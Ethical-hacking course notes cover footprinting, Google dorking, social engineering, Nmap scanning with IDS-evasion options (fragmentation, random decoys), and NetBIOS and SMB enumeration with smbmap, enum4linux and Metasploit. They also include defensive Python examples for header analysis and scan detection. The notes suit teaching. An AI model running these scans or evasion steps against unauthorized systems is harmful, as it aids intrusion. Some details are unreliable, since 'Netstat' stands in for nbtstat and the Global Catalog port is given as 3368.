Ethical Hacking

UNIT-2

Footprinting
Footprinting is the process of gathering information about a target system, network, or organization to identify security
vulnerabilities. It is the first step in ethical hacking and penetration testing.
Types of Footprinting
1. Passive Footprinting – Collecting publicly available information without direct interaction with the target.
Ex:
o WHOIS lookup
o DNS records analysis
o Social media and company websites
2. Active Footprinting – Directly engaging with the target to collect data.
Ex:
o Port scanning using Nmap
o Traceroute analysis
o Banner grabbing
Footprinting Tools
• Nmap – For scanning network ports.
• theHarvester – Gathers emails and subdomains.
• Maltego – Visualizes relationships between gathered data.

Key Objectives:
1. Identify the Target’s Infrastructure
o Gather details about IP addresses, domain names, subdomains, and network topology.
2. Collect Organizational Information
o Extract details about employees, job roles, partners, and technologies used from public sources like
websites, job postings, and social media.
3. Identify Security Weaknesses
o Discover outdated software, misconfigurations, or unpatched vulnerabilities that could be exploited.
4. Gather Network and System Information
o Obtain details about open ports, services running on servers, and operating system versions.
5. Understand Security Policies and Procedures
o Analyze the organization’s security posture, firewall rules, and access controls.
6. Assist in Penetration Testing
o Provide valuable insights for ethical hackers to simulate real-world cyber attacks and improve
defenses.

Footprinting Methodologies
1. Passive Footprinting
Collecting publicly available information without directly interacting with the target.
Ex: WHOIS lookup, analyzing job postings, and social media research.
2. Active Footprinting
Directly engaging with the target system to gather details.
Ex: Port scanning, traceroute, and banner grabbing using tools like Nmap and Netcat.
3. Search Engine Footprinting
Using search engines to discover sensitive data, hidden files, cached pages, and indexed directories.
Ex: Publicly available data, finding an exposed [Link] file.

PES University Department of CSE


4. Google Hacking (Google Dorking)


Using advanced search operators (Google Dorks) to find login pages, exposed databases, and security
misconfigurations.
Ex: filetype:pdf site:[Link] to find all PDFs on a website.
5. DNS Footprinting
Gathering domain-related information such as subdomains, mail servers, and DNS records.
Tools: nslookup, Dig, theHarvester.
6. Network Footprinting
Identifying IP addresses, open ports, running services, and firewall detection.
Tools: Nmap, Shodan.
7. Examining HTML Source Code
Analyzing a website’s source code to extract metadata, hidden comments, and sensitive information.
Ex: Finding developer comments with credentials in HTML.
8. Examining Cookies
Inspecting cookies stored by websites to understand session management and security loopholes.
Ex: Identifying persistent authentication tokens that can be exploited.
9. Email Footprinting
Analyzing email headers to track sender details, mail servers, and IP addresses.
Tools: Email header analysis tools, MXToolbox.
10. Competitive Intelligence
Gathering business-related information through financial reports, job postings, patents, and market analysis.

Google Advanced Search Operators (Google Dorks)


Google Advanced Search Operators, also known as Google Dorks, help refine searches to find specific information
efficiently. These operators are widely used for ethical hacking, penetration testing, and OSINT (Open-Source
Intelligence).

Common Google Search Operators

• site: – Searches within a specific website. Example: site:[Link]
• filetype: – Finds specific file types (PDF, DOC, TXT, etc.). Example: filetype:pdf site:[Link]
• intitle: – Searches for keywords in the title of webpages. Example: intitle:login
• inurl: – Searches for keywords in URLs. Example: inurl:admin
• cache: – Shows the cached version of a webpage. Example: cache:[Link]
• related: – Finds sites similar to a given URL. Example: related:[Link]
• link: – Finds pages that link to a specific site. Example: link:[Link]
• allintext: – Searches for keywords in the text of a webpage. Example: allintext:password filetype:txt
• allintitle: – Searches for pages where all words appear in the title. Example: allintitle:secure login
• allinurl: – Searches for pages where all words appear in the URL. Example: allinurl:admin login

Website Footprinting
Website footprinting is the process of gathering information about a target website, including its structure,
technologies, and vulnerabilities.


Techniques of Website Footprinting


1. WHOIS Lookup
o Retrieves domain registration details like owner, registrar, and contact information.
o Tool: whois <domain> (Linux) or online WHOIS lookup tools.
2. DNS Enumeration
o Identifies subdomains, mail servers, and DNS records.
o Tools: nslookup, dig, Fierce, Sublist3r.
3. Website Crawling & Scraping
o Extracts website structure, links, and hidden directories.
o Tools: HTTrack, Scrapy, wget -r <URL>.
4. Google Dorking
o Uses advanced search queries to find sensitive information.
o Example: site:[Link] filetype:pdf (finds PDFs on a domain).
5. Checking Website Technologies
o Identifies CMS, frameworks, and plugins.
o Tools: Wappalyzer, BuiltWith, whatweb <URL>.
6. Extracting Metadata
o Finds hidden data in images, documents, and PDFs.
o Tools: ExifTool, FOCA.

➢ Wappalyzer is a web extension technology profiler that shows you what websites are built with.
➢ Netcraft site reports can be used to generate a comprehensive analysis of a target website including
hosting information and history, DNS server information and site technology among others.

Email Footprinting
Email footprinting is the process of gathering information about a target's email addresses, such as their
associated domains, mail servers, metadata, and possible vulnerabilities.

Techniques of Email Footprinting


1. WHOIS Lookup
o Retrieves domain registration details, including admin email addresses.
o Tool: whois <domain> or online WHOIS lookup services.
2. Email Header Analysis
o Extracts information such as the sender's IP address, mail server, and routing path.
o Tool: Email clients (Gmail, Outlook) or Email Header Analyzer tools.
3. Email Harvesting
o Collects email addresses from websites, forums, and social media.
o Tools: theHarvester, Maltego, [Link].
4. MX Record Lookup
o Identifies mail servers used by a domain.
o Tool: nslookup -type=MX <domain> or online MX record checkers.
5. Google Dorking for Emails
o Uses search engine queries to find exposed email addresses.
o Example: site:[Link] "contact@*".
6. Social Engineering & Phishing Analysis

o Examines how email-based attacks are used to trick users.
o Tools: PhishTank, Have I Been Pwned (to check leaked emails).
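Email header analysis, as an added example written for these notes (not from the original document): it parses the Received: chain of a constructed message oldest-first, returns the originating IP and flags hops whose announced hostname is not confirmed by reverse DNS. All hostnames and addresses are made up.

```python
import re
from email import message_from_string, policy

# Constructed message (not from the original notes). Each mail server prepends its own
# Received: header, so the topmost header is the newest hop and the bottom one is the origin.
SAMPLE_MESSAGE = """\
Received: from mx-edge.example.net (mx-edge.example.net [198.51.100.7])
\tby mail.example.org with ESMTPS id abc123
\tfor <alice@example.org>; Tue, 04 Mar 2025 10:15:02 +0000
Received: from relay.example.net (relay.example.net [203.0.113.9])
\tby mx-edge.example.net with ESMTP id def456;
\tTue, 04 Mar 2025 10:15:01 +0000
Received: from laptop.local (unknown [192.0.2.45])
\tby relay.example.net with ESMTPSA id ghi789;
\tTue, 04 Mar 2025 10:14:59 +0000
From: "Example Sender" <sender@example.net>
To: alice@example.org
Subject: Quarterly report
Message-ID: <20250304101459.ghi789@relay.example.net>

Please see the attached report.
"""

# "from <helo> (<reverse-dns> [<ip>]) by <server>": the name the sender announced, what the
# receiving server saw when it looked up the connecting IP, and the receiving server itself.
HOP_RE = re.compile(
    r"from\s+(?P<helo>\S+)"
    r"(?:\s+\((?P<rdns>[^\s\[\]()]+)?\s*\[(?P<ip>[^\]]+)\]\))?"
    r".*?\bby\s+(?P<by>\S+)"
)


def received_chain(raw_message: str) -> list:
    """Parse every Received: header and return the hops oldest-first (origin to final server)."""
    msg = message_from_string(raw_message, policy=policy.default)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        text = " ".join(str(value).split())  # unfold the header onto one line
        m = HOP_RE.search(text)
        if m:
            hops.append({"helo": m["helo"], "rdns": m["rdns"], "ip": m["ip"], "by": m["by"]})
    return hops


def originating_ip(hops: list):
    """IP recorded by the first server that accepted the message. Only headers added by
    servers you trust can be believed; anything below them could have been forged by the sender."""
    return hops[0]["ip"] if hops else None


def helo_mismatches(hops: list) -> list:
    """Hops whose announced hostname is not confirmed by reverse DNS; on the first hop this
    is a common sign of a forged or disposable origin."""
    return [h["helo"] for h in hops
            if not h["rdns"] or h["rdns"].lower() != h["helo"].lower()]


if __name__ == "__main__":
    chain = received_chain(SAMPLE_MESSAGE)
    for hop in chain:
        print(f"{hop['helo']:<22} ({hop['rdns']} [{hop['ip']}]) -> {hop['by']}")
    print("originating IP:", originating_ip(chain))
    print("unconfirmed HELO names:", helo_mismatches(chain))
```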

DNS Footprinting
DNS footprinting is the process of gathering information about a target domain’s DNS records,
subdomains, IP addresses, and mail servers. Ethical hackers use this technique to assess security risks and
identify vulnerabilities in an organization's network.

Techniques of DNS Footprinting


1. WHOIS Lookup
o Retrieves domain registration details, including owner, registrar, and contact information.
o Tool: whois <domain> or online WHOIS lookup services.
2. DNS Zone Transfer (AXFR Attack)
o Extracts entire DNS records from a misconfigured name server.
o Tool: dig axfr @nameserver <domain>.
3. NS Lookup (Name Server Lookup)
o Identifies authoritative DNS servers for a domain.
o Tool: nslookup -type=NS <domain>.
4. MX Record Lookup (Mail Server Records)
o Finds the mail servers handling emails for a domain.
o Tool: nslookup -type=MX <domain>.
5. Subdomain Enumeration
o Identifies hidden subdomains that might expose internal services.
o Tools: Sublist3r, Amass, nslookup <[Link]>.
6. Reverse DNS Lookup
o Maps an IP address to its domain name.
o Tool: nslookup <IP> or host <IP>.
7. Google Dorking for DNS Information
o Example: site:[Link] -www (Finds subdomains).

Network Footprinting
Network footprinting is the process of gathering information about a target network, such as IP addresses,
subnets, devices, and security configurations. Ethical hackers use this technique to map the network
structure and identify vulnerabilities.

Techniques of Network Footprinting:


1. WHOIS Lookup – Retrieves domain and IP ownership details.
2. Traceroute – Traces the path of packets through the network.
3. Ping Sweep – Detects active devices on a network.
4. DNS Lookup – Finds domain-to-IP mappings.
5. Port Scanning – Identifies open ports and services.


Purpose:
• Identifies network infrastructure.
• Detects security misconfigurations.
• Helps in penetration testing and reconnaissance.

Tools:
Ping
Ping is a network tool used to check if a host is reachable and measure response time using ICMP Echo
Requests.
Purpose:
• Checks if a host is online.
• Measures network latency.
• Detects packet loss.

Traceroute (tracert in Windows)


Traceroute identifies the route packets take to reach a destination and detects network delays.
Purpose:
• Maps network path and routers.
• Identifies network bottlenecks.
• Diagnoses connection issues.

Social Engineering
Social Engineering is the psychological manipulation of people to trick them into revealing confidential information,
such as passwords, financial details, or security credentials. Instead of exploiting technical vulnerabilities, attackers
exploit human behavior and trust to gain unauthorized access to systems, data, or physical locations.
It is commonly used in cybersecurity attacks, frauds, and scams, where attackers impersonate trusted entities
through emails, phone calls, or in-person interactions to deceive victims.
Ex: A hacker posing as IT support calls an employee, asking for their login credentials to "fix a system issue."

Types of Social Engineering


1. Human-Based Social Engineering
Involves direct interaction with people to trick them into revealing sensitive information. Attackers exploit human
psychology rather than technical vulnerabilities.
Techniques:
• Impersonation – The attacker pretends to be someone trustworthy (e.g., IT support, police) to gain access.
Example: A hacker poses as an employee to enter a secure office.
• Tailgating (Piggybacking) – The attacker follows an authorized person into a restricted area without
credentials. Example: A person carrying a fake delivery box enters a restricted floor.
• Pretexting – The attacker creates a fabricated scenario to extract confidential details. Example: A scammer
calls an employee, pretending to be their manager, and asks for login credentials.
• Dumpster Diving – Searching trash bins for sensitive documents like passwords, invoices, or personal
records. Example: An attacker finds an old company invoice containing financial details.

2. Computer-Based Social Engineering


Uses digital platforms to deceive users into giving up sensitive data, often by exploiting trust in technology. These
attacks can lead to financial fraud, malware infections, or identity theft.


Techniques:
• Phishing – Fraudulent emails or websites mimic legitimate sources to steal credentials. Example: A user gets
an email from a "bank" asking to reset their password through a fake link.
• Spear Phishing – A targeted phishing attack customized for a specific individual or organization. Example: A
fake email from a "CEO" asks an employee to transfer funds urgently.
• Baiting – Attackers offer something tempting (like free software or USB devices) to spread malware.
Example: A hacker leaves a USB labeled “Salary Report” in an office, hoping someone plugs it in.
• Scareware – Fake virus alerts trick users into installing malicious software. Example: A pop-up claims "Your
computer is infected! Click here to remove the virus."

3. Mobile-Based Social Engineering


Targets users through mobile devices using calls, SMS, or malicious applications. Attackers exploit the fact that
mobile users often act quickly without verifying information.
Techniques:
• Vishing (Voice Phishing) – Fraudulent phone calls impersonating customer support or officials. Example: A
scammer pretends to be from "bank security" and asks for card details over the phone.
• Smishing (SMS Phishing) – Fraudulent text messages containing malicious links or fake warnings. Example:
"Your account has been blocked! Click here to reactivate," leading to a phishing site.
• Malicious Apps – Fake apps that steal personal data or track users' activities. Example: A malicious "free
VPN" app secretly records keystrokes to steal login credentials.
• One-Time Password (OTP) Theft – Attackers trick users into sharing OTPs for fraudulent transactions.
Example: A scammer calls a victim pretending to be from their bank and asks for an OTP to "verify their
identity."

Scanning
Scanning is a set of procedures for identifying live hosts, ports, and services, discovering the operating system and architecture of the target system, and identifying vulnerabilities and threats in the network. Network scanning is used to create a profile of the target organization.
Scanning refers to collecting more information using complex and aggressive reconnaissance techniques.

Types of Scanning
1. Network Scanning – Identifying active hosts and devices on a network.
2. Port Scanning – Finding open ports and services running on a target.
3. Vulnerability Scanning – Detecting security weaknesses in systems.
4. Web Application Scanning – Finding security flaws in web apps (e.g., SQL injection, XSS).
5. Malware Scanning – Checking for malicious software or backdoors.
6. Banner Grabbing (Service & Version Scanning) – Retrieves details about the services running on those open ports.

Common Scanning Tools


• Nmap – Port and network scanning.
• Angry IP Scanner – Simple IP and port scanner.
• Nessus – Vulnerability assessment.
• Nikto – Web server scanning.
• OpenVAS – Open-source vulnerability scanner.

Scanning Methodology


Ethical hackers follow a structured scanning methodology to gather information about a target system and identify
vulnerabilities. The key steps involved are:
1. Check for Live Systems
o Identifies active hosts in a network.
o Techniques: Ping Sweep, ARP Scanning
o Tool: nmap -sn <IP-Range>
2. Check for Open Ports
o Finds open ports and running services.
o Technique: TCP/UDP Port Scanning
o Tool: nmap -p 1-65535 <IP>
3. Scan Beyond IDS (Intrusion Detection System)
o Avoids detection using stealthy scanning methods.
o Techniques: SYN Scan, Fragmented Packet Scan
o Tool: nmap -sS -f <IP>
4. Perform Banner Grabbing
o Retrieves service versions and OS details.
o Techniques: Telnet, Netcat, Nmap Service Scan
o Tool: nmap -sV <IP>
5. Scan for Vulnerabilities
o Detects security flaws in systems.
o Tools: Nessus, OpenVAS, Nmap Vuln Script
o Command: nmap --script=vuln <IP>
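From the defender's side of the scanning methodology above, an added example (not from the original notes) that runs over constructed iptables-style firewall log lines and flags the two patterns the methodology starts with: a ping sweep (one source sending ICMP echo requests to many hosts) and a port scan (one source sending SYNs to many ports). The log layout, addresses and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def constructed_log() -> list:
    """Constructed firewall log lines in iptables LOG style (not captured from a real firewall):
    one source hits many ports on one host, one pings many hosts, one client behaves normally."""
    base = datetime(2025, 3, 4, 10, 15, 0)
    lines = []
    # 203.0.113.5 sends SYNs to 15 different ports of 10.0.0.7 within 15 seconds (port scan).
    for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445, 3306, 3389, 8080]):
        t = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{t} fw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=10.0.0.7 PROTO=TCP SPT=44321 DPT={port} SYN")
    # 198.51.100.20 sends ICMP echo requests to 8 hosts of 10.0.0.0/24 within 8 seconds (ping sweep).
    for i in range(1, 9):
        t = (base + timedelta(seconds=30 + i)).isoformat()
        lines.append(f"{t} fw kernel: IN=eth0 OUT= SRC=198.51.100.20 DST=10.0.0.{i} PROTO=ICMP TYPE=8 CODE=0")
    # 10.0.0.50 is an ordinary client: a few connections to web and IMAP spread over an hour.
    for i, port in enumerate([443, 443, 993, 443]):
        t = (base + timedelta(minutes=15 * i)).isoformat()
        lines.append(f"{t} fw kernel: IN=eth1 OUT= SRC=10.0.0.50 DST=10.0.0.7 PROTO=TCP SPT=5{i}001 DPT={port} SYN")
    return lines


def parse_line(line: str) -> dict:
    """Split 'timestamp host process: KEY=VALUE ... FLAG' into one event dict."""
    ts, _, rest = line.partition(" ")
    tokens = rest.split()
    fields = dict(t.split("=", 1) for t in tokens if "=" in t)
    flags = {t for t in tokens if "=" not in t}
    return {"ts": datetime.fromisoformat(ts), "src": fields.get("SRC"), "dst": fields.get("DST"),
            "proto": fields.get("PROTO"), "dport": fields.get("DPT"), "type": fields.get("TYPE"),
            "syn": "SYN" in flags}


def max_distinct_in_window(events: list, key, window_s: int) -> int:
    """Largest number of distinct key(event) values inside any window_s-second sliding window.
    Events must be sorted by timestamp."""
    counts, best, left = defaultdict(int), 0, 0
    for ev in events:
        counts[key(ev)] += 1
        while (ev["ts"] - events[left]["ts"]).total_seconds() > window_s:
            old = key(events[left])
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            left += 1
        best = max(best, len(counts))
    return best


def detect_scans(lines: list, window_s: int = 60, port_threshold: int = 10, host_threshold: int = 5) -> dict:
    """Return {source IP: [reasons]} for sources whose SYN-to-many-ports or echo-to-many-hosts
    activity exceeds the thresholds; quiet sources are not reported."""
    by_src = defaultdict(list)
    for line in lines:
        if line.strip():
            ev = parse_line(line)
            by_src[ev["src"]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        syns = [e for e in evs if e["proto"] == "TCP" and e["syn"]]
        echos = [e for e in evs if e["proto"] == "ICMP" and e["type"] == "8"]
        ports = max_distinct_in_window(syns, lambda e: (e["dst"], e["dport"]), window_s)
        hosts = max_distinct_in_window(echos, lambda e: e["dst"], window_s)
        reasons = []
        if ports >= port_threshold:
            reasons.append(f"port scan: {ports} distinct ports within {window_s}s")
        if hosts >= host_threshold:
            reasons.append(f"ping sweep: {hosts} distinct hosts within {window_s}s")
        if reasons:
            findings[src] = reasons
    return findings


if __name__ == "__main__":
    for src, why in detect_scans(constructed_log()).items():
        print(src, "->", "; ".join(why))
```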

Network Scanning
Network scanning is the process of identifying active hosts, open ports, running services, and vulnerabilities in a
network.

In general, network scanning has three main objectives:

1. Scanning for live devices, OS, and IPs in use.
Ex: Server at [Link]
2. Looking for open/closed ports.
Ex: The server [Link] has TCP port 23 (Telnet) running
3. Searching for vulnerabilities in the services scanned.
Ex: The Telnet service is cleartext and has many published vulnerabilities

Nmap and Its Scan Types


Nmap (Network Mapper) is an open-source tool used for network scanning, security auditing, and vulnerability
assessment. It helps identify live hosts, open ports, services, OS versions, and security risks in a network.

Scan Types:
1) Stealth scan / SYN scan:
The Stealth Scan, also known as a half-open or SYN scan, is a network scanning technique employed by Nmap. Nmap sends a SYN packet to each target port; these SYN packets are the first step of the TCP 3-way handshake that is used to establish a connection. The handshake is never completed, so the final ACK packet is not sent.

• To execute a Stealth Scan using Nmap, use the command:
nmap -sS <target IP> -p <port>

2) TCP Full Connect Scan:

The first two steps of this scanning technique (SYN and SYN/ACK) are exactly the same as with a SYN scan. It completes the 3-way handshake: a full connection is first established between the two machines and is then torn down with RST packets.

• The command to execute this scan is as follows:
nmap -sT <target IP>

3) UDP Scan
Sending UDP packets to target ports to determine whether they are open or closed.
UDP is connectionless.
No response from closed ports.

• The corresponding command to use this scan is as follows:
nmap -sU <target>

• We can also specify which UDP ports we wish the scan to be performed on (the port list takes no spaces):
nmap -sU -p U:53,123 <target>

• We can fire up both TCP and UDP scans with a port specification for each protocol in the same list:
nmap -sU -sS -p U:53,123,T:80,443 <target>

• To perform UDP service versioning, we can use:
nmap -sU -sV -p <ports to be scanned> <IP address>

4) Ping Sweep
Scanning technique used to discover live hosts within a range of IP addresses.
A successful response (ICMP Echo Reply) indicates the presence of an active host, while no response suggests
an inactive or blocked host.

• The corresponding command to do so is as follows:
nmap -sn [Link]/24
This command uses the -sn flag (ping scan) against the whole /24 range.

Evasion techniques
To evade an IDS, sometimes we need to change the way we scan. Some of the different ways we can use Nmap to evade detection are:
a) Fragmenting packets
Fragmenting packets can help in network evasion by breaking large packets into smaller fragments.

This fragmentation technique can be used to hide malicious content or reconnaissance activities.
Command: nmap -sS -f <target>

There are two techniques through which packet fragmentation can be carried out:
Active – sending crafted packets to the target.
Passive – sniffing network traffic for things such as TTL and window values, DF flags and ToS fields.


b) Spoofing
Spoofing in the scanning process involves manipulating the source addresses of network packets to hide the origin of the packet.

c) Multiple decoy IP addresses:

Nmap sends multiple packets with different source IP addresses, along with the scanning host's own IP address. It works in tandem with spoofing.
Command: nmap -D RND:<number> <target>

Example: nmap -D RND:10 [Link]

d) Proxy
A proxy hides the true identity of the scanning host.
Proxy chaining is a technique used to enhance anonymity and security. It involves routing network traffic through multiple proxy servers.

e) Tor
A specific type of proxy that uses multiple hops to reach a destination; the endpoints are peer computers.

Top 9 Must-Have Ethical Hacking Skills for Beginners


1. Computer Networking Skills
2. Proficient Computer Skills
3. Cryptography Skills
4. Knowledge of Operating Systems
5. Database Management to Prevent Data Breaches
6. Scripting Skills
7. Analytical and Problem-Solving Abilities
8. Programming Language Skills
9. Social Engineering Techniques

Enumeration
Enumeration is defined as the process of extracting usernames, machine names, network resources, shares and services from a system. In this phase, the attacker creates an active connection to the system and performs directed queries to gain more information about the target. The gathered information is used to identify the vulnerabilities or weak points in system security, which the attacker then tries to exploit in the system-gaining phase.

Types of information enumerated by intruders:


• Network Resource and shares
• Users and Groups
• Routing tables
• Auditing and Service settings
• Machine names
• Applications and banners
• SNMP and DNS details

Techniques for Enumeration


• Extracting user names using email IDs


• Extract information using the default password
• Brute Force Active Directory
• Extract user names using SNMP
• Extract user groups from Windows
• Extract information using DNS Zone transfer

Services and Port to Enumerate


• TCP 53: DNS Zone transfer
• TCP 135: Microsoft RPC Endpoint Mapper
• TCP 137: NetBIOS Name Service
• TCP 139: NetBIOS session Service (SMB over NetBIOS)
• TCP 445: SMB over TCP (Direct Host)
• UDP 161: SNMP
• TCP/UDP 389: LDAP
• TCP/UDP 3368: Global Catalog Service
• TCP 25: Simple Mail Transfer Protocol (SMTP)

NetBIOS Enumeration
NetBIOS is an acronym that stands for Network Basic Input Output System. It enables computer communication over
a LAN and the sharing of files and printers. TCP/IP network devices are identified using NetBIOS names (Windows).
It must be network-unique and limited to 16 characters, with 15 reserved for the device name and the 16th reserved for
identifying the type of service running or name record type.
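As an added example (not from the original notes) of the naming rule just described: it encodes and decodes the 16-byte NetBIOS name (15 characters plus a service suffix) using the nibble-to-letter first-level encoding carried in NBT packets, and summarises a constructed name table in the layout nbtstat -A prints into the hosts, domains and services it reveals to anyone who can query the host. The host and domain names are made up.

```python
import re

# NetBIOS name suffixes (the 16th byte) and the service each one advertises.
SUFFIX_TYPES = {
    0x00: "Workstation Service",
    0x03: "Messenger Service",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers (group)",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections (group)",
    0x20: "File Server Service",
}


def encode_netbios_name(name: str, suffix: int, pad: bytes = b" ") -> str:
    """First-level encoding: pad the name to 15 bytes, append the suffix byte, then split every
    byte into two nibbles and map each nibble to a letter 'A'..'P' (32 characters in total).
    The wildcard name '*' used by name-table queries is padded with NUL bytes instead of spaces."""
    if len(name) > 15:
        raise ValueError("NetBIOS names hold at most 15 characters plus the suffix byte")
    raw = name.upper().encode("ascii").ljust(15, pad) + bytes([suffix])
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)


def decode_netbios_name(encoded: str) -> tuple:
    """Reverse the encoding; returns (name, suffix, service description)."""
    if len(encoded) != 32 or not all("A" <= c <= "P" for c in encoded):
        raise ValueError("not a first-level-encoded NetBIOS name")
    raw = bytes(((ord(encoded[i]) - 0x41) << 4) | (ord(encoded[i + 1]) - 0x41)
                for i in range(0, 32, 2))
    name = raw[:15].decode("ascii").rstrip(" \x00")
    suffix = raw[15]
    return name, suffix, SUFFIX_TYPES.get(suffix, f"unknown (0x{suffix:02X})")


# Constructed name table in the layout nbtstat -A prints (not captured from a real host).
SAMPLE_NAME_TABLE = """\
       NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    FILESRV01      <00>  UNIQUE      Registered
    FILESRV01      <20>  UNIQUE      Registered
    CORP           <00>  GROUP       Registered
    CORP           <1C>  GROUP       Registered
    CORP           <1B>  UNIQUE      Registered
"""

ROW_RE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)", re.MULTILINE)


def summarize_name_table(text: str) -> dict:
    """Reduce a name table to what a defender cares about: which machine names and domain or
    workgroup names are exposed, and which services each name advertises."""
    summary = {"hosts": set(), "domains": set(), "services": []}
    for name, hexsuffix, kind in ROW_RE.findall(text):
        suffix = int(hexsuffix, 16)
        is_domain = kind == "GROUP" or suffix == 0x1B   # <1B> is the domain name held by the PDC
        (summary["domains"] if is_domain else summary["hosts"]).add(name)
        summary["services"].append((name, suffix, SUFFIX_TYPES.get(suffix, "unknown")))
    return summary


def advertises_file_share(summary: dict) -> list:
    """Names registered with the <20> File Server suffix, i.e. hosts exposing shares over SMB."""
    return sorted({n for n, s, _ in summary["services"] if s == 0x20})


if __name__ == "__main__":
    print(encode_netbios_name("*", 0x00, pad=b"\x00"))      # the name-table query wildcard
    print(decode_netbios_name(encode_netbios_name("FILESRV01", 0x20)))
    s = summarize_name_table(SAMPLE_NAME_TABLE)
    print("hosts:", s["hosts"], "domains:", s["domains"], "file servers:", advertises_file_share(s))
```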
Uses of NetBIOS Enumeration

• Discover Shared Resources – Identify shared files, folders, and printers on a Windows system.
• Enumerate User & Machine Names – Obtain usernames, workgroups, and domain details.
• Privilege Escalation – Exploit misconfigured shares to gain unauthorized access to files.
• Lateral Movement – Use NetBIOS information to navigate and compromise other systems.
• Denial of Service (DoS) Attacks – Exploit NetBIOS vulnerabilities to disrupt services.
• Brute Force & Credential Attacks – List valid user accounts and attempt brute-force logins.

NetBIOS Enumeration Tools


NetBIOS enumeration tools help scan networks for security vulnerabilities, gathering critical system details such as
OS versions, user accounts, password policies, shared resources, and more.

Popular Tools for NetBIOS Enumeration


NBTScan – Scans networks for NetBIOS name information, listing shares, MAC addresses, and open ports.
NetBIOS Enumerator – Extracts NetBIOS names, shares, and user details from a Windows system.
Enum – Retrieves usernames, shares, groups, and password policies from Windows systems.
NBTEnum – A command-line tool for scanning IP ranges and listing NetBIOS shares and sessions.
Nmap (NetBIOS Scripts) – nmap --script nbstat retrieves NetBIOS details from target machines.
SMBMap – Identifies SMB shares and their permissions, helping locate misconfigurations.
Metasploit (Auxiliary Modules) – Uses NetBIOS enumeration modules to gather target system details.


Netstat:
Netstat is a utility for obtaining protocol statistics, the NetBIOS name table, name cache information and current TCP/IP connections over NBT (NetBIOS over TCP/IP), assisting in troubleshooting NetBIOS name resolution issues. Name resolution is normally performed when NetBIOS over TCP/IP is operational.

Nbtstat parameters and their respective functions:

• -a RemoteName – Displays the NetBIOS name table of a remote computer, where RemoteName is the remote computer's NetBIOS computer name.
• -A IPAddress – Displays the NetBIOS name table of a remote computer, as specified by the remote computer's IP address (in dotted decimal notation).
• -c – Lists the contents of the NetBIOS name cache, the table of NetBIOS names and their resolved IP addresses.
• -n – Displays the names that NetBIOS applications, such as the server and redirector, have registered locally.
• -r – Displays the total number of names resolved by broadcast or by a WINS server.
• -R – Removes all #PRE entries from LMHOSTS and clears the name cache.
• -RR – Releases all names and reregisters them with the name server.
• -s – Lists the NetBIOS sessions table, with destination IP addresses converted to computer NetBIOS names.
• -S – Lists the current NetBIOS sessions, along with their status and IP addresses.
• Interval – Displays the selected statistics again, pausing for the amount of time specified in Interval between each display.

Examples:
1. To display the NetBIOS name table of a remote computer
Netstat -a

2. To see IPv4/IPv6 Group Memberships


Netstat -g

3. To display the kernel interface table


Netstat -i


Enumerating user accounts using PsTools:


• PsExec
• PsFile
• PsGetSid
• PsKill
• PsInfo
• PsList
• PsLoggedOn
• PsLogList
• PsPasswd
• PsShutdown

SMB Enumeration
SMB (Server Message Block) is a client-server communication protocol that is used for sharing access to files, devices, serial ports, and other resources on a network. SMB enumeration is a multipart process in which we enumerate the host or target system for different information, such as hostnames, share lists, null sessions, vulnerabilities, etc.

SMB Enumeration Stages:


• Hostname enumeration
• List Share
• Checking Null session
• List users
• Vulnerability Scanning
• Overall Scanning

SMB Enumeration for Hostname


There are plenty of tools that can enumerate the hostname; here, to demonstrate, we use nmblookup and nbtscan. The nmblookup tool queries NetBIOS names and maps them to their related IP addresses in a network.
1. Nmblookup:
$ nmblookup -A <Target IP>

2. Nbtscan:
$ nbtscan <target IP>

SMB Enumeration for Share and Null Session:


In this part, we are going to enumerate shares of the host or target system. We can perform this enumeration with
many tools, for this article we are going to use smbmap, smbclient, Nmap, and Metasploit for different ways of
performing this share enumeration.

1. Smbmap: Smbmap allows the attacker to enumerate samba share drives on the IP address. It also lists drive
permissions and upload/download functionality.
$ smbmap -H <target IP>

Also, we can scan for specific user shares using the credentials by using the below command
$ smbmap -H <target IP> -u username -p password


2. smbclient: It is a Samba client, and it is useful to test connectivity to Windows shares.


$ smbclient -L <target IP>

3. Nmap: Nmap provides smb-enum-shares NSE script which can be used to enumerate the shares.
$ nmap --script smb-enum-shares -p 139,445 <Target IP>

4. Metasploit: In Metasploit, we use the smb_enumshares module, which will enumerate any SMB share present on the server.
msf6 > use auxiliary/scanner/smb/smb_enumshares
msf6 auxiliary(scanner/smb/smb_enumshares) > set rhosts <target IP>
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbuser <username>
msf6 auxiliary(scanner/smb/smb_enumshares) > set smbpass <password>
msf6 auxiliary(scanner/smb/smb_enumshares) > exploit

SMB Enumeration for Vulnerability Scanning:


In this stage, we use Nmap's scripts to scan for vulnerabilities that could possibly be found on the server. Various tools can be used for this stage, but here we are going to look at Nmap's NSE scripts.
Nmap's smb-vuln NSE scripts:
Nmap has a wide range of scripts for different purposes; here, as an example, we look at smb-check-vulns (in current Nmap releases its checks are split into the individual smb-vuln-* scripts, which is what the wildcard in the command below matches). These scripts can scan targets for a wide range of vulnerabilities, for example:
• cve2009-3103
• regsvc-dos
• ms06-025
$ sudo nmap --script smb-vuln* -p 139,445 <Target IP>
Example:

(The scan output screenshot is not reproduced here.)

Result: here we scanned the target with the specific script, and we did not find any vulnerability, as we can see in the scan.

SMB Enumeration by Enum4Linux:

Enum4linux is a powerful tool that can detect and fetch data from both Windows and Linux hosts, as well as from SMB hosts on the network.
$ enum4linux -U <target IP>

DNS Enumeration
DNS Enumeration is a reconnaissance technique used to better understand the surface area of the target systems (i.e. their IP addresses).
• The process of DNS enumeration returns various important pieces of information about the target, such as DNS record types, host names, IP addresses and much more, depending upon the configuration of that target system.
• To perform DNS enumeration there are various open-source tools and scripts available, such as Nmap, DNSRecon, etc.
Importance and Impacts:
Importance:


